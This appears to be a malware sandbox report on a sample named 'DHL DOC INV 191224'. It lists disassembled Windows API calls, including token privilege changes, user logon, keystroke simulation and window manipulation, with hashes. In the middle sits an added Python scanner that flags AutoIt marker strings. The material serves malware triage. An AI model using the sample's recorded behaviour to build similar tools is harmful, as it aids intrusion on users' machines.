                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 93c5e6f9285ca844342356fd1a4173c9f6e337cfe358186be3af8497711e59cc
                                                                                                                        • Instruction ID: 2cf55821c48fd11a81ab9eb50d58ca704f4469b6abf007a6ff389cc41ee8b237
                                                                                                                        • Opcode Fuzzy Hash: 93c5e6f9285ca844342356fd1a4173c9f6e337cfe358186be3af8497711e59cc
                                                                                                                        • Instruction Fuzzy Hash: EBE065311012245AE62326679D05FDA364DAF427B1F168121BC15979A5DB21DD0983E1
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334F6D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: c4471c58597e669fee1842460365e7a33b68ba4aaa27d10fa1cf969b4436ab05
                                                                                                                        • Instruction ID: 3f4a2224b770f5b943adbb0074c412cbd91a2cac95658aad71e4a650ae29a09d
                                                                                                                        • Opcode Fuzzy Hash: c4471c58597e669fee1842460365e7a33b68ba4aaa27d10fa1cf969b4436ab05
                                                                                                                        • Instruction Fuzzy Hash: D2F03071105751CFDB369F65D4D0C12B7E4EF1431971989BEE1DA82621C731B844DF10
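The FreeLibrary call context above carries the string >>>AUTOIT NO CMDEXECUTE<<<, an AutoIt3 runtime string that is consistent with the report's "Binary is likely a compiled AutoIt script file" signature. The scanner below is an added example, not code from Joe Sandbox or from the sample: it searches a binary for that marker as both narrow ASCII and UTF-16LE (the runtime is a Unicode build, as the W-suffixed APIs in this report suggest) and reports offsets. The second marker, AU3!EA06, is the AutoIt3 compiled-script resource magic; it does not appear on this page and is included as an assumption. The input is a constructed byte blob, not the real sample. Caveat for triage: the runtime marker is present in every AutoIt3 binary, benign tools included, so a hit identifies the interpreter stub, not malicious intent.

```python
"""Scan a binary blob for AutoIt3 marker strings.

Added example for this report, not Joe Sandbox or sample code. The runtime
marker ">>>AUTOIT NO CMDEXECUTE<<<" is the string visible in the FreeLibrary
call context of the report; "AU3!EA06" is the AutoIt3 compiled-script resource
magic and is an assumption here, since it does not appear on this page.
"""
from __future__ import annotations

MARKERS: dict[str, str] = {
    "autoit_runtime": ">>>AUTOIT NO CMDEXECUTE<<<",  # present in the report
    "autoit_script_magic": "AU3!EA06",             # assumption, see docstring
}


def find_autoit_markers(data: bytes) -> dict[str, list[tuple[int, str]]]:
    """Return {marker_name: [(offset, encoding), ...]} for every occurrence.

    Each marker is searched both as narrow ASCII and as UTF-16LE: the AutoIt3
    runtime is a Unicode build (note the W-suffixed APIs in the report, e.g.
    GetLongPathNameW), so its own strings are wide, while resource magics are
    narrow. Searching both forms avoids missing either.
    """
    hits: dict[str, list[tuple[int, str]]] = {}
    for name, text in MARKERS.items():
        for needle, label in ((text.encode("ascii"), "ascii"),
                              (text.encode("utf-16-le"), "utf-16le")):
            start = 0
            while (idx := data.find(needle, start)) != -1:
                hits.setdefault(name, []).append((idx, label))
                start = idx + 1
    return hits


def autoit_verdict(data: bytes) -> str:
    """Coarse triage verdict derived from the marker hits.

    "compiled-script": runtime marker and script magic both present
    "runtime-only":    interpreter stub present, no script resource found
                       (packed, stripped, or a plain AutoIt3 interpreter)
    "none":            no AutoIt markers at all
    The runtime marker alone is not evidence of malice: every AutoIt3 binary,
    benign or not, carries it.
    """
    hits = find_autoit_markers(data)
    if "autoit_runtime" in hits and "autoit_script_magic" in hits:
        return "compiled-script"
    if "autoit_runtime" in hits:
        return "runtime-only"
    return "none"


# Constructed sample input (not a real PE and not the analysed sample): a fake
# header, the wide runtime marker at offset 64 and the narrow script magic at
# offset 132.
SAMPLE_BLOB = (
    b"MZ" + b"\x00" * 62
    + ">>>AUTOIT NO CMDEXECUTE<<<".encode("utf-16-le")
    + b"\x00" * 16
    + b"AU3!EA06"
    + b"\xff" * 8
)
BENIGN_BLOB = b"MZ" + b"\x00" * 100  # constructed: no markers at all


if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_BLOB), ("benign", BENIGN_BLOB)):
        print(label, autoit_verdict(blob), find_autoit_markers(blob))
```

To run it against a real file, read it with `open(path, "rb").read()` and pass the bytes to `autoit_verdict`; the offsets returned by `find_autoit_markers` can be cross-checked against the string references in a disassembler such as the IDA snapshot this report was built from.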
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00332DC4
  • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
• Opcode ID: ca38674f1d8a2d04944aede8e5f09eed088d141e927ad5754161c7458c11b5a1
• Instruction ID: 6346e4f0b0c98929a1b22679263779550ec29980a0d1a42b1304a5e7413182d5
• Opcode Fuzzy Hash: ca38674f1d8a2d04944aede8e5f09eed088d141e927ad5754161c7458c11b5a1
• Instruction Fuzzy Hash: 24E0CD72A001245BCB2192589C06FDA77DDDFC8790F044171FD0DD7248D964AD808650
APIs
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
• Instruction ID: 2cd68d873279b0e8104e08730d2c72de325377209425b602f3b4c4f233cec5a7
• Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
• Instruction Fuzzy Hash: 1AE048B06097005FDF3D5A28A9517B777E4DF4A301F01045EF59F86362E5726845864D
APIs
  • Part of subcall function 00333837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00333908
  • Part of subcall function 0033D730: GetInputState.USER32 ref: 0033D807
• SetCurrentDirectoryW.KERNEL32(?), ref: 00332B6B
  • Part of subcall function 003330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0033314E
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: IconNotifyShell_$CurrentDirectoryInputState
• String ID:
• API String ID: 3667716007-0
• Opcode ID: ebf094c63335a950eb551264556d6d8636939ec47ae1898c93b9d71f62c26463
• Instruction ID: 85978609952f98b87d66c0b07f4000739faeb47cb577b449dc7e6a8b379fd551
• Opcode Fuzzy Hash: ebf094c63335a950eb551264556d6d8636939ec47ae1898c93b9d71f62c26463
• Instruction Fuzzy Hash: A9E08C3270424406CA0ABB74A8D29AEA7599BD1362F40957EF1469F1B3CF788A498352
APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00370704,?,?,00000000,?,00370704,00000000,0000000C), ref: 003703B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 76a153f5ea98b277bcaec1a628ee2c61c9e0c8e6e4df84a773174413e4fe858e
                                                                                                                        • Instruction ID: ac8a46d0addd19556b3628a25f6ae7668807543c71acdddecb0c9aa0ecd51c45
                                                                                                                        • Opcode Fuzzy Hash: 76a153f5ea98b277bcaec1a628ee2c61c9e0c8e6e4df84a773174413e4fe858e
                                                                                                                        • Instruction Fuzzy Hash: 03D06C3205010DBBDF028F85DD06EDA3BAAFB48714F014000FE1896020C732E821AB90
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00331CBC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3098949447-0
                                                                                                                        • Opcode ID: 4e1db591429ac0177464341e0682fafdb1f29eedd06c6486a474855f945b947f
                                                                                                                        • Instruction ID: 33387f2f6a3ff370a05c65ba35ef2c45abeaaf9cacc42fb2f3380e888f03731d
                                                                                                                        • Opcode Fuzzy Hash: 4e1db591429ac0177464341e0682fafdb1f29eedd06c6486a474855f945b947f
                                                                                                                        • Instruction Fuzzy Hash: 39C09236280304AFF3159B80BE4EF107768A348B00F049011FA0EB95F3C3F22821EB58
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00EAEFB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction ID: 0e6526e7fd069c127236d9150c4d20ff0deb11b7584831d5ffe1bd636e7a1875
                                                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                        • Instruction Fuzzy Hash: 33E0BF7494410DEFDB00DFA4D5496DD7BB4EF04301F1005A1FD05E7680DB309E548A62
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00EAEFB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction ID: 59dcdad68bc842b8c764e424ad03a103ae0e501fae225cf6353e023ef39a08bd
                                                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                        • Instruction Fuzzy Hash: DDE0E67494410DDFDB00DFB4D54969D7FB4EF04301F100161FD01E2280D6309D508A62
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003C961A
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003C965B
                                                                                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 003C969F
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003C96C9
                                                                                                                        • SendMessageW.USER32 ref: 003C96F2
                                                                                                                        • GetKeyState.USER32(00000011), ref: 003C978B
                                                                                                                        • GetKeyState.USER32(00000009), ref: 003C9798
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003C97AE
                                                                                                                        • GetKeyState.USER32(00000010), ref: 003C97B8
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003C97E9
                                                                                                                        • SendMessageW.USER32 ref: 003C9810
                                                                                                                        • SendMessageW.USER32(?,00001030,?,003C7E95), ref: 003C9918
                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003C992E
                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003C9941
                                                                                                                        • SetCapture.USER32(?), ref: 003C994A
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 003C99AF
                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003C99BC
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C99D6
                                                                                                                        • ReleaseCapture.USER32 ref: 003C99E1
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C9A19
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 003C9A26
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003C9A80
                                                                                                                        • SendMessageW.USER32 ref: 003C9AAE
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003C9AEB
                                                                                                                        • SendMessageW.USER32 ref: 003C9B1A
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003C9B3B
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003C9B4A
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C9B68
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 003C9B75
                                                                                                                        • GetParent.USER32(?), ref: 003C9B93
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003C9BFA
                                                                                                                        • SendMessageW.USER32 ref: 003C9C2B
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 003C9C84
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003C9CB4
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003C9CDE
                                                                                                                        • SendMessageW.USER32 ref: 003C9D01
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 003C9D4E
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003C9D82
                                                                                                                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C9E05
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                        • String ID: @GUI_DRAGID$F$p#@$xV
                                                                                                                        • API String ID: 3429851547-966052478
                                                                                                                        • Opcode ID: cbc28aeb089667235144f86b62906449acdce280d2217bec7e0506958bb109cd
                                                                                                                        • Instruction ID: af9508be6e0fb572f4d1409759fb21310d8a1905771202ecbed07574a2db8918
                                                                                                                        • Opcode Fuzzy Hash: cbc28aeb089667235144f86b62906449acdce280d2217bec7e0506958bb109cd
                                                                                                                        • Instruction Fuzzy Hash: 44427A75204200AFD726CF24CD48FAABBE9EF49320F16461EF599D72A1D731AD60CB41
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003C48F3
                                                                                                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 003C4908
                                                                                                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 003C4927
                                                                                                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 003C494B
                                                                                                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 003C495C
                                                                                                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 003C497B
                                                                                                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003C49AE
                                                                                                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003C49D4
                                                                                                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 003C4A0F
                                                                                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003C4A56
                                                                                                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003C4A7E
                                                                                                                        • IsMenu.USER32(?), ref: 003C4A97
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C4AF2
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C4B20
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C4B94
                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 003C4BE3
                                                                                                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 003C4C82
                                                                                                                        • wsprintfW.USER32 ref: 003C4CAE
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C4CC9
                                                                                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 003C4CF1
                                                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C4D13
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C4D33
                                                                                                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 003C4D5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
• String ID: %d/%02d/%02d$xV
• API String ID: 4054740463-4269844612
• Opcode ID: 0996331b507132453de7c0357b7d48fdb02e47eb585655bf7e6359a9119788ec
• Instruction ID: bdb6218166c7d323c4c120638b7c2ef9361ad7744affc44735fe87b1533bc78e
• Opcode Fuzzy Hash: 0996331b507132453de7c0357b7d48fdb02e47eb585655bf7e6359a9119788ec
• Instruction Fuzzy Hash: 9112EF71600214ABEB269F28CD59FAEBBF8EF45310F14412DF51AEA2E1DB74AD41CB50
APIs
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0034F998
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0038F474
• IsIconic.USER32(00000000), ref: 0038F47D
• ShowWindow.USER32(00000000,00000009), ref: 0038F48A
• SetForegroundWindow.USER32(00000000), ref: 0038F494
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038F4AA
• GetCurrentThreadId.KERNEL32 ref: 0038F4B1
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038F4BD
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0038F4CE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0038F4D6
• AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0038F4DE
• SetForegroundWindow.USER32(00000000), ref: 0038F4E1
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F4F6
• keybd_event.USER32(00000012,00000000), ref: 0038F501
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F50B
• keybd_event.USER32(00000012,00000000), ref: 0038F510
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F519
• keybd_event.USER32(00000012,00000000), ref: 0038F51E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0038F528
• keybd_event.USER32(00000012,00000000), ref: 0038F52D
• SetForegroundWindow.USER32(00000000), ref: 0038F530
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 0038F557
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: bf10ecbd11464f565d320006afe6fa6795f23f6ea226e4c30e83fbc96c782cd9
• Instruction ID: c1d1e841566c22dbec90070190faa570de5ddaa237eebe1dddbc9bcbce59ce55
• Opcode Fuzzy Hash: bf10ecbd11464f565d320006afe6fa6795f23f6ea226e4c30e83fbc96c782cd9
• Instruction Fuzzy Hash: C531A671A50318BFEB226BB64C4AFBF7E6CEB45B50F151066F604E61D1C7B06D00AB60
APIs
  • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
  • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
  • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00391286
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003912A8
• CloseHandle.KERNEL32(?), ref: 003912B9
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003912D1
• GetProcessWindowStation.USER32 ref: 003912EA
• SetProcessWindowStation.USER32(00000000), ref: 003912F4
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00391310
  • Part of subcall function 003910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003911FC), ref: 003910D4
  • Part of subcall function 003910BF: CloseHandle.KERNEL32(?,?,003911FC), ref: 003910E9
Strings
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0$Z?
• API String ID: 22674027-1168915105
• Opcode ID: f2cefc3a7dbab0c82014302d6b0e22fcab371265641e9af551bb9464bb46bd82
• Instruction ID: 1c43c8cd50b94dfa47795b87a2dd47e63585fc2eec4c31ef8b3326d562d0d6bb
• Opcode Fuzzy Hash: f2cefc3a7dbab0c82014302d6b0e22fcab371265641e9af551bb9464bb46bd82
• Instruction Fuzzy Hash: 2F818B7190020AAFEF229FA5DC49FEE7BB9EF08704F184129FA14F61A0C7319954CB20
APIs
  • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
  • Part of subcall function 003910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
  • Part of subcall function 003910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
  • Part of subcall function 003910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
  • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00390BCC
